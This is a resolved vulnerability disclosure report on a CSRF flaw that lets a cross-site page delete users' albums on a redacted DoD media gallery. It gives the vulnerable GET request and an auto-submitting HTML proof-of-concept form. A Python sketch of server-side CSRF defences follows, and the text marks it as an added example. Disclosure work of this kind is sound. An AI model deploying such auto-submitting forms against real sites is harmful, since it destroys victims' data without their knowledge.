CSRF attack leads to album deletion at
Medium
## Vulnerability Details
**Description:**
Through research, I discovered a CSRF vulnerability in one of the DoD assets, `www.████████`.
There is a feature to create albums for a collection of media such as photos and videos. While performing some actions on it, I found that there is no CSRF verification when deleting albums.
Additionally, the delete request is based on GET, so it is even easier for an attacker to exploit.
## Vulnerable Request
```http
GET /mediagallery/delete/id/{album-id} HTTP/2
Host: www.██████
Cookie: {YOUR-SESSSION}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://www.█████████/mediagallery/index
```
## References
- Here is the detailed video PoC:
████
## Impact
- CSRF attack
- Deletion of users' albums
## System Host(s)
www.█████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
1 - Create an account on `www.███████`.
2 - Navigate to `https://www.█████████/search?filter[type]=image` and click on the icon below to create an album.
████████
3 - Here is the CSRF PoC exploit:
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://www.█████/mediagallery/delete/id/{album-id}">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
4 - Replace `{album-id}` with your actual `album-id`.
## Suggested Mitigation/Remediation Actions
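The report leaves this section empty. As an added example (not from the report or the affected site), the following Python sketch shows the server-side checks that would have stopped this request: refusing state changes over GET, verifying the Origin/Referer header against the site's own origin, and requiring a session-bound synchronizer token on the delete form. The request and session objects are constructed stand-ins, and `SITE_ORIGIN` is a placeholder for the redacted host.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Placeholder for the redacted DoD host in the report (constructed, not the real site).
SITE_ORIGIN = "https://www.example-asset.mil"


def issue_csrf_token(session):
    """Mint a per-session synchronizer token and bind it to the server-side session."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def delete_allowed(request, session):
    """Decide whether an album-delete request may proceed; returns (allowed, reason)."""
    # 1. Never perform a state change on GET: a link or <img> on any page would fire it.
    if request["method"] != "POST":
        return False, "state change via %s rejected" % request["method"]
    # 2. Browsers send Origin (or at least Referer) on cross-site form posts;
    #    reject anything that does not come from our own origin.
    headers = {k.lower(): v for k, v in request["headers"].items()}
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "missing Origin/Referer"
    parts = urlsplit(source)
    if "%s://%s" % (parts.scheme, parts.netloc) != SITE_ORIGIN:
        return False, "cross-origin request from %s" % source
    # 3. Synchronizer token: the form value must match the session's token (constant-time compare).
    expected = session.get("csrf_token", "")
    supplied = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "invalid CSRF token"
    return True, "ok"


def demo():
    """Run three constructed requests through the check and return name -> allowed."""
    session = {}
    token = issue_csrf_token(session)
    cases = {
        # the request shape from the report: GET with only a same-site Referer
        "get_from_report": {"method": "GET", "headers": {"Referer": SITE_ORIGIN + "/mediagallery/index"}, "form": {}},
        # the PoC upgraded to POST but served from an attacker-controlled page
        "cross_site_post": {"method": "POST", "headers": {"Origin": "https://attacker.example"}, "form": {}},
        # the site's own delete form carrying the session-bound token
        "legit_post": {"method": "POST", "headers": {"Origin": SITE_ORIGIN}, "form": {"csrf_token": token}},
    }
    return {name: delete_allowed(req, session)[0] for name, req in cases.items()}
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer on top of this, but it does not replace the server-side token check.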
## Report Stats
- Report ID: 2652190
- State: Closed
- Substate: resolved